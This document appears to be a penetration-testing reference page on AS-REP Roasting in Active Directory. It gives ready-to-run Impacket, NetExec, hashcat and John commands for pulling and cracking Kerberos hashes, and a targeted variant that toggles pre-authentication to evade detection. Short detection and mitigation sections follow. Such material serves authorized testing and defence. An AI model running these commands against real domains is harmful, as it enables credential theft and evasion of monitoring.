AS-REP Roasting

Overview

AS-REP Roasting targets accounts that have Kerberos pre-authentication disabled (DONT_REQUIRE_PREAUTH). When pre-authentication is disabled, anyone can request an AS-REP (Authentication Service Response) for that user without knowing their password. The response contains a portion encrypted with the user's password hash, which can be cracked offline. Unlike Kerberoasting, AS-REP Roasting does not require valid domain credentials if you have a list of usernames.

ATT&CK Mapping

  • Tactic: TA0006 - Credential Access
  • Technique: T1558.004 - Steal or Forge Kerberos Tickets: AS-REP Roasting

Prerequisites

  • List of domain usernames (or valid domain credentials to enumerate)
  • Network access to a Domain Controller (port 88 Kerberos)

Techniques

Without Domain Credentials

If you have a username list but no credentials:

# Impacket
# https://github.com/fortra/impacket
impacket-GetNPUsers '<domain>/' -usersfile users.txt -dc-ip <dc_ip> -format hashcat -outputfile asrep.txt

# With specific format for John
impacket-GetNPUsers '<domain>/' -usersfile users.txt -dc-ip <dc_ip> -format john -outputfile asrep.txt

With Domain Credentials

Enumerate all accounts with pre-auth disabled and extract hashes automatically:

# Impacket — find and roast all vulnerable accounts
# https://github.com/fortra/impacket
impacket-GetNPUsers '<domain>/<user>:<password>' -dc-ip <dc_ip> -request

# Save to file
impacket-GetNPUsers '<domain>/<user>:<password>' -dc-ip <dc_ip> -request -format hashcat -outputfile asrep.txt

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --asreproast asrep.txt

Crack AS-REP Hashes

# Hashcat
# https://github.com/hashcat/hashcat

# AS-REP etype 23 (RC4) — mode 18200
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best66.rule

# John the Ripper
# https://github.com/openwall/john
john asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt

Targeted AS-REP Roasting

If you have GenericAll or GenericWrite on a user, you can disable pre-authentication and then AS-REP roast them:

# Disable pre-auth on a target account (requires write permission)
Set-ADAccountControl -Identity <target_user> -DoesNotRequirePreAuth $true

# Then roast the account
# After cracking, re-enable pre-auth to reduce detection
Set-ADAccountControl -Identity <target_user> -DoesNotRequirePreAuth $false

Detection Methods

Network-Based Detection

  • AS-REQ requests without pre-authentication data (PA-DATA) for multiple accounts
  • Kerberos traffic from non-domain-joined hosts

Host-Based Detection

  • Windows Security Event 4768 (Kerberos Authentication Ticket Requested) with pre-auth type 0 (no pre-auth)
  • Changes to userAccountControl attribute enabling DONT_REQUIRE_PREAUTH

Mitigation Strategies

  • Enable pre-authentication — ensure DONT_REQUIRE_PREAUTH is not set on any accounts
  • Strong passwords — enforce complex passwords for any accounts that require pre-auth disabled
  • Monitor attribute changes — alert on modifications to userAccountControl that disable pre-auth
  • Regular auditing — scan for accounts with pre-auth disabled using LDAP queries

References

Official Documentation

MITRE ATT&CK